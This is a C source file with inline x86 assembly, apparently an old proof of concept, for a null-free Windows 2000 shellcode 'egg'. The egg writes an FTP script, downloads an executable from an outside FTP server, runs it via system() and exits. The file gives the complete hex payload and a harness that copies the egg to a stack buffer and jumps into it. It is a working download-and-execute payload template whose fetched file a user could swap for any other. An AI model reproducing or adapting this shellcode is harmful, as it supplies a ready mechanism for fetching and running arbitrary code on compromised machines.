/* Simple egg download and start installing Netscape4.79 tested on Japanese Windows 2000 Pro (SP2) written by Kanatoko http://www.jumperz.net/ compile: $bcc32 egg_netscape.cpp //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// written in C: FILE* handle; char filename[] = "q"; char command[] = "binary\nget /pub/communicator/english/4.79/windows/windows95_or_nt/complete_install/cc32d479.exe\nquit"; handle = fopen( filename, "w" ); fputs( command, handle ); fclose( handle ); system( "ftp.exe -s:q -A ftp.netscape.com" ); system( "cc32d479.exe" ); //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// HEX code: 0x55,0x8B,0xEC,0x53,0xEB,0x57,0x90,0x90, 0x90,0x5B,0x33,0xC0,0x88,0x63,0x01,0x88, 0x63,0x03,0x83,0xC3,0x68,0x88,0x23,0x88, 0x63,0x21,0x88,0x63,0x2E,0x83,0xEB,0x68, 0x53,0x83,0xC3,0x02,0x53,0xB9,0xC2,0x1B, 0x02,0x78,0xFF,0xD1,0x50,0x83,0xC3,0x02, 0x53,0xB9,0x8B,0x38,0x02,0x78,0xFF,0xD1, 0x59,0xB9,0xB8,0x0E,0x01,0x78,0xFF,0xD1, 0x83,0xC3,0x65,0x53,0xB9,0x4A,0x9B,0x01, 0x78,0xFF,0xD1,0x83,0xC3,0x21,0x53,0xB9, 0x4A,0x9B,0x01,0x78,0xFF,0xD1,0xB8,0x94, 0x8F,0xE6,0x77,0xFF,0xD0,0xE8,0xA7,0xFF, 0xFF,0xFF,0x77,0x58,0x71,0x58,0x62,0x69, 0x6E,0x61,0x72,0x79,0x0A,0x67,0x65,0x74, 0x20,0x2F,0x70,0x75,0x62,0x2F,0x63,0x6F, 0x6D,0x6D,0x75,0x6E,0x69,0x63,0x61,0x74, 0x6F,0x72,0x2F,0x65,0x6E,0x67,0x6C,0x69, 0x73,0x68,0x2F,0x34,0x2E,0x37,0x39,0x2F, 0x77,0x69,0x6E,0x64,0x6F,0x77,0x73,0x2F, 0x77,0x69,0x6E,0x64,0x6F,0x77,0x73,0x39, 0x35,0x5F,0x6F,0x72,0x5F,0x6E,0x74,0x2F, 0x63,0x6F,0x6D,0x70,0x6C,0x65,0x74,0x65, 0x5F,0x69,0x6E,0x73,0x74,0x61,0x6C,0x6C, 0x2F,0x63,0x63,0x33,0x32,0x64,0x34,0x37, 0x39,0x2E,0x65,0x78,0x65,0x0A,0x71,0x75, 0x69,0x74,0x58,0x66,0x74,0x70,0x2E,0x65, 0x78,0x65,0x20,0x2D,0x73,0x3A,0x71,0x20, 0x2D,0x41,0x20,0x66,0x74,0x70,0x2E,0x6E, 0x65,0x74,0x73,0x63,0x61,0x70,0x65,0x2E, 0x63,0x6F,0x6D,0x58,0x63,0x63,0x33,0x32, 
0x64,0x34,0x37,0x39,0x2E,0x65,0x78,0x65, 0x58
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
*/

// NOTE(review): the header names after the three #include directives were lost
// in this copy of the file; the code below uses LoadLibrary, strncmp, memcpy
// and printf, so the original presumably pulled in the Win32 and C-runtime
// headers. As written these three lines do not preprocess.
#include
#include
#include

// Absolute addresses of the C-runtime routines (msvcrt.dll, loaded in main())
// and of ExitProcess, hard-coded for the one library build this was tested
// against (see the header comment: Japanese Windows 2000 Pro SP2). Nothing is
// resolved at run time, so on any other OS version, service pack or language
// build these values will in general point somewhere else and the egg crashes
// instead of calling the intended routine.
#define FPUTS 0x7802388b // fputs()
#define EP 0x77E68F94 // ExitProcess()
#define FOPN 0x78021bc2 // fopen()
#define SYTM 0x78019b4a // system()
#define FCLS 0x78010eb8 // fclose()

//-----------------------------------------------------------------------------
// The "egg": a self-contained blob of machine code plus its data. hoge() is
// never called as a normal function; main() copies its bytes (up to the
// six-NOP sentinel at the end of the asm block) into a stack buffer and jumps
// there, so everything in here must work regardless of where it is loaded.
//
// Layout: the jmp lbl1 / call lbl2 pair leaves the address of the data block
// (the db strings that follow "call lbl2") in EBX. Every displacement below is
// a byte offset inside that data block, computed from the lengths of the db
// strings: "wX" at 0, "qX" at 2, "binary\n get ...\n quitX" at 4 (its "X" at
// 104), "ftp.exe ... comX" at 105 ("X" at 137), "cc32d479.exeX" at 138 ("X" at
// 150). Editing any db string therefore requires recomputing all of them.
// The strings are written with "X" in place of every terminator so the blob
// contains no 0x00 byte; the stores of AH (zero after xor EAX,EAX) patch the
// real NUL terminators in at run time.
void hoge()
{
    __asm {
        jmp lbl1
    lbl2:
        pop EBX                     // EBX = address of the data block
        xor EAX, EAX                // AH = 0, the NUL byte stored below
        mov [ EBX + 1 ], AH         // set NULL: "wX" -> "w"   (fopen() mode)
        mov [ EBX + 3 ], AH         // set NULL: "qX" -> "q"   (fopen() name)
        add EBX, 104                // avoid NULL: offsets 137 and 150 do not fit an
                                    // 8-bit displacement and a 32-bit one would put
                                    // 0x00 bytes in the blob, so rebase EBX instead
        mov [ EBX ], AH             // set NULL: terminates the ftp script after "quit"
        mov [ EBX + 33 ], AH        // set NULL: terminates "ftp.exe -s:q -A ftp.netscape.com"
        mov [ EBX + 46 ], AH        // set NULL: terminates "cc32d479.exe"
        sub EBX, 104                // back to the start of the data block
        push EBX                    // fopen() 2nd arg: mode "w"
        add EBX, 2
        push EBX                    // fopen() 1st arg: file name "q"
        mov ECX, FOPN
        call ECX                    // call fopen(); EAX = FILE*
        push EAX                    // fputs() 2nd arg: the FILE*
        add EBX, 2
        push EBX                    // fputs() 1st arg: the ftp script text
        mov ECX, FPUTS
        call ECX                    // call fputs()
        pop ECX                     // delete fputs() 1st arg; the FILE* now sits on top
        mov ECX, FCLS
        call ECX                    // call fclose( FILE* )
        add EBX, 101                // data block + 105
        push EBX                    // system() arg
        mov ECX, SYTM
        call ECX                    // call system( "ftp.exe ..." )
        add EBX, 33                 // data block + 138
        push EBX                    // system() arg
        mov ECX, SYTM
        call ECX                    // call system( "cc32d479.exe" )
        // Pushed arguments are never popped after the cdecl calls above; the
        // stack is left unbalanced, which does not matter because ExitProcess()
        // never returns.
        mov EAX, EP
        call EAX                    // call ExitProcess()
    lbl1:
        call lbl2                   // pushes the address of the data block below
        // every "X" below is converted to NULL at run time (see the AH stores above)
        db "wX"
        db "qX"
        db "binary"
        db 0x0A
        db "get /pub/communicator/english/4.79/windows/windows95_or_nt/complete_install/cc32d479.exe"
        db 0x0A
        db "quitX"
        db "ftp.exe -s:q -A ftp.netscape.comX"
        db "cc32d479.exeX"
        // sentinel: main() measures the egg by scanning for these six NOPs
        nop
        nop
        nop
        nop
        nop
        nop
    }
}

//-----------------------------------------------------------------------------
// Test harness: measures the egg, copies it into a stack buffer and runs it.
int main( int argc, char* argv[] )
{
    // The egg calls the C runtime through the absolute addresses above, so the
    // DLL must be mapped into this process before the egg runs.
    LoadLibrary( "msvcrt.dll" );
    char buf_stack[ 300 ];
    // Six-NOP sentinel matching the end of hoge()'s asm block. 0x90 (144) is
    // out of range for a signed char; bcc32 accepts the implementation-defined
    // narrowing, stricter compilers may warn or reject it.
    const char nop6[] = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
    int length = 0;
    //get length of egg: walk hoge()'s machine code until the sentinel is found.
    // NOTE(review): the loop has no upper bound. If the compiler lays the
    // function out differently (no contiguous body, sentinel removed or
    // padded), the scan reads past the end of the code — undefined behavior.
    char* p = ( char* )hoge;
    for( ;; ++length, ++p ) {
        int r = strncmp( p, nop6, 6 );
        if( r == 0 ) {
            break;
        }
    }
    /*
    //print egg
    p = ( char* )hoge;
    for( int i = 0, j = 0; i < length; ++i, ++p, ++j ) {
        if( (*p&0xFF) < 0x10 ) {
            printf( "0x0%X," ,*p&0xFF );
        } else {
            printf( "0x%X,", *p&0xFF );
        }
        if( j == 7 ) {
            printf( "\n" );
            j=-1;
        }
    }
    printf( "\n" );
    */
    //copy to stack and execute
    // NOTE(review): length is not checked against sizeof buf_stack (300); an
    // egg longer than that overruns the buffer. Running code out of buf_stack
    // also requires an executable stack — on a platform that enforces DEP/NX
    // the call below faults instead of running the egg.
    memcpy( buf_stack, ( char* )hoge, length );
    char* egg_p = buf_stack;
    __asm {
        mov eax, egg_p
        call eax                    // does not return: the egg ends in ExitProcess()
    }
    return 0;
}
//---------------------------------------------------------------------------